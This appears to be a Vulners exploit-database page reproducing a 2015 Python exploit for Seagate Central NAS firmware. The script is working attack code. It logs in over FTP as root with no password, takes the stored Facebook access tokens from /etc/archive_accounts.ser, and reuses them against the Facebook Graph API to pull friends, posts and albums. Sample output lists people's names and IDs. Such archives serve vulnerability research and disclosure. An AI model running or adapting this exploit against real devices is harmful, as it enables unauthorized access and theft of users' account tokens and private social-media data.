Vulners
Lucene search
Seagate Central 2014.0410.0026-F Remote Facebook Access Token Exploit
#!/usr/bin/python
# seagate_central_facebook.py
#
# Seagate Central Remote Facebook Access Token Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central stores linked Facebook account access tokens in /etc/archive_accounts.ser
# and this exploit takes advantage of two bugs:
#
# 1) Passwordless root login via FTP to retrieve archive_accounts.ser file which contains access tokens
# 2) Reuses the unencrypted and unprotected (-rw-r--r--) access tokens for a chosen scope to return data
#
# -Example-
#
# > seagate_fb_accounts.py getaccesstoken 1.2.3.4
#
# 'archive_accounts.ser'
#
# a:1:{s:8:"facebook";a:1:{s:29:"[email protected]";a:5:{s:7:"service";s:8:"facebook";s:4:
# "user";s:29:"[email protected]";s:5:"owner";s:4:"test";s:6:"folder";s:7:"private";s:5:"t
# oken";s:186:"CAAxxxxxxxx..."
# ;}}}
#
# Next, try this:
#
# > seagate_fb_accounts.py CAAxxxxxxxx... friends
# server response:
#
# {'data': [{'name': 'Jessie Taylor', 'id': '100000937485968'}, {'name': 'Kellie Youty', 'id': '1
# 00000359801427'}, {'name': 'Hope Maynard', 'id': '10000102938470'}, {'name': 'Angel Tucker Pole', 'id'
# : '100001402808867'}, {'name': 'Malcolm Vance', 'id': '10000284629187'}, {'name': 'Tucker Civile', 'id':
# .....
#
# Scopes Reference: https://developers.facebook.com/docs/graph-api/reference/v2.1/user
#
# -Fixes-
#
# Seagate scheduled updates to go live on April 28th, 2015.
#
# Tested version: 2014.0410.0026-F
#
import sys
import json
from urllib import request # python3
from ftplib import FTP
fb_url = "https://graph.facebook.com"
fb_filename = "archive_accounts.ser"
def getaccesstoken(host):
try:
ftp = FTP(host)
ftp.login("root")
ftp.retrbinary("RETR " + "/etc/" + fb_filename, open(fb_filename, 'wb').write)
ftp.close()
except Exception as error:
print("Error: %s" % error)
return
try:
with open(fb_filename, 'r') as file:
data = file.read()
except Exception as error:
print("Error: %s" % error)
return
print("\n'%s'\n\n%s\n\n" % (fb_filename, data))
return
def main():
if(len(sys.argv) < 2):
print("Usage: %s <key> <scope> OR getaccesstoken <host>\n" % sys.argv[0])
print("scopes: albums feed friends likes picture posts television")
return
if(sys.argv[1] == "getaccesstoken"):
if(len(sys.argv) == 3):
host = sys.argv[2]
res = getaccesstoken(host)
else:
print("Error: need host to retrieve access token file\n")
return
else:
key = sys.argv[1]
if(len(sys.argv) == 3):
scope = sys.argv[2]
else:
scope = ""
try:
response = request.urlopen(fb_url + "/me/" + scope + "?access_token=" + key).read()
except Exception as error:
print("Error: %s" % error)
return
data = json.loads(response.decode('utf-8'))
print("server response:\n\n%s\n" % data)
return
if __name__ == "__main__":
main()
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2015 00:00Current
7High risk
Vulners AI Score7